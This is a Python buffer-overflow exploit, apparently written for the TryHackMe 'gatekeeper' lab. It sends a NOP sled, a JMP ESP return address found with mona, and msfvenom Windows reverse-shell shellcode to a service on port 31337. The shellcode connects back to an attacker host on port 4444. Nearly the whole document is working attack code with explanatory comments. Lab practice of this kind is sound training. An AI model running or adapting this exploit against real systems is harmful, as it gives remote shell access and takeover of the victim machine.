
THM - gatekeeper

Exploit

#!/usr/bin/env python3
import socket, time, sys, subprocess


ip = "10.10.130.44"  # lab target host (see page title); hard-coded, no argv handling
port = 31337         # target service port
enter = b"\r\n"      # CRLF appended as the final bytes of the payload

# msfvenom -p windows/shell_reverse_tcp LHOST=10.18.9.175 LPORT=4444 -b "\x00\x09\x0a" -f python EXITFUNC=thread

# Shellcode buffer as emitted by the msfvenom command above (python output
# format); the connect-back host/port are baked into these bytes.
buf =  b""
buf += b"\xda\xd0\xbe\xa5\xbb\x49\xa1\xd9\x74\x24\xf4\x58\x33"
buf += b"\xc9\xb1\x52\x31\x70\x17\x83\xc0\x04\x03\xd5\xa8\xab"
buf += b"\x54\xe9\x27\xa9\x97\x11\xb8\xce\x1e\xf4\x89\xce\x45"
buf += b"\x7d\xb9\xfe\x0e\xd3\x36\x74\x42\xc7\xcd\xf8\x4b\xe8"
buf += b"\x66\xb6\xad\xc7\x77\xeb\x8e\x46\xf4\xf6\xc2\xa8\xc5"
buf += b"\x38\x17\xa9\x02\x24\xda\xfb\xdb\x22\x49\xeb\x68\x7e"
buf += b"\x52\x80\x23\x6e\xd2\x75\xf3\x91\xf3\x28\x8f\xcb\xd3"
buf += b"\xcb\x5c\x60\x5a\xd3\x81\x4d\x14\x68\x71\x39\xa7\xb8"
buf += b"\x4b\xc2\x04\x85\x63\x31\x54\xc2\x44\xaa\x23\x3a\xb7"
buf += b"\x57\x34\xf9\xc5\x83\xb1\x19\x6d\x47\x61\xc5\x8f\x84"
buf += b"\xf4\x8e\x9c\x61\x72\xc8\x80\x74\x57\x63\xbc\xfd\x56"
buf += b"\xa3\x34\x45\x7d\x67\x1c\x1d\x1c\x3e\xf8\xf0\x21\x20"
buf += b"\xa3\xad\x87\x2b\x4e\xb9\xb5\x76\x07\x0e\xf4\x88\xd7"
buf += b"\x18\x8f\xfb\xe5\x87\x3b\x93\x45\x4f\xe2\x64\xa9\x7a"
buf += b"\x52\xfa\x54\x85\xa3\xd3\x92\xd1\xf3\x4b\x32\x5a\x98"
buf += b"\x8b\xbb\x8f\x0f\xdb\x13\x60\xf0\x8b\xd3\xd0\x98\xc1"
buf += b"\xdb\x0f\xb8\xea\x31\x38\x53\x11\xd2\x4d\xb6\x10\x8d"
buf += b"\x3a\xb4\x22\xc0\xe6\x31\xc4\x88\x06\x14\x5f\x25\xbe"
buf += b"\x3d\x2b\xd4\x3f\xe8\x56\xd6\xb4\x1f\xa7\x99\x3c\x55"
buf += b"\xbb\x4e\xcd\x20\xe1\xd9\xd2\x9e\x8d\x86\x41\x45\x4d"
buf += b"\xc0\x79\xd2\x1a\x85\x4c\x2b\xce\x3b\xf6\x85\xec\xc1"
buf += b"\x6e\xed\xb4\x1d\x53\xf0\x35\xd3\xef\xd6\x25\x2d\xef"
buf += b"\x52\x11\xe1\xa6\x0c\xcf\x47\x11\xff\xb9\x11\xce\xa9"
buf += b"\x2d\xe7\x3c\x6a\x2b\xe8\x68\x1c\xd3\x59\xc5\x59\xec"
buf += b"\x56\x81\x6d\x95\x8a\x31\x91\x4c\x0f\x51\x70\x44\x7a"
buf += b"\xfa\x2d\x0d\xc7\x67\xce\xf8\x04\x9e\x4d\x08\xf5\x65"
buf += b"\x4d\x79\xf0\x22\xc9\x92\x88\x3b\xbc\x94\x3f\x3b\x95"

## !mona modules
## !mona jmp -r esp -m gatekeeper.exe

# Bytes as sent, in order: 146 filler bytes, the 4-byte value taken from the
# !mona output above, 10 more filler bytes, the msfvenom buffer, 4 bytes of
# "C", then the CRLF terminator. The print below reports the total length.
payload = (b"\x90" * 146)  + (b"\xc3\x14\x04\x08") + (b"\x90" * 10) + buf + (b"C" * 4) + enter

# NOTE: "Pyadlod" is a typo for "payload"; the runtime message text is left as-is.
print("Pyadlod size: {} payload: {}".format(len(payload), payload))

try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(5)  # 5 s limit applies to connect(), send() and recv() below
        s.connect((ip, port))
        print("Exploit with {} bytes".format(len(payload)))
        s.send(payload)
        print(s.recv(1024))  # waits up to 5 s for a reply; a timeout lands in the except below
        s.close()  # redundant: the with-block already closes the socket on exit
except Exception as e:
    # Any failure (refused connection, timeout, reset) is printed and the
    # script exits with status 0, so a caller cannot tell failure from success.
    # NOTE: "crached" is a typo for "crashed"; the runtime message text is left as-is.
    print("Exploit crached at {} bytes error message {}".format(len(payload), e))
    sys.exit(0)